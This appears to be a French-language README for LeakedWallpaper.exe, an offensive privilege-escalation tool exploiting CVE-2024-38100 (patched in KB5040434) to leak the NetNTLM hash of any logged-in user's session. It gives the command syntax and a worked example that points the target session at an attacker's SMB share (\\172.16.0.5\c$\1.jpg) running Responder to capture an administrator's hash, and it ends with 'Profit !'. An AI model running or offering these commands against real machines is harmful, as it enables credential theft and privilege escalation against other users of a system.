
Fuite du hash NetNTLM de n'importe quel utilisateur. Corrigé dans KB5040434.
Il s'agit d'un outil d'élévation de privilèges (corrigé avec CVE-2024-38100 dans KB5040434) qui permet d'exfiltrer le hash NetNTLM d'un utilisateur depuis n'importe quelle session sur l'ordinateur, même en travaillant depuis un utilisateur à faibles privilèges.
.\LeakedWallpaper.exe <session> \\<KALI IP>\c$\1.jpg [-downgrade]
# Example
.\LeakedWallpaper.exe 1 \\172.16.0.5\c$\1.jpg -downgrade
Si la vidéo est bloquée, voir demo.mkv
Imaginez que nous ayons deux sessions sur la machine :
ID de session actuelle : 2
ID de session cible : 1

IP du Responder : 172.16.0.5
IP Windows : 172.16.0.2

Obtenons le hash NetNTLM d'administrator grâce à l'outil !
.\LeakedWallpaper 1 \\172.16.0.5\c$\1.jpg
Profit !
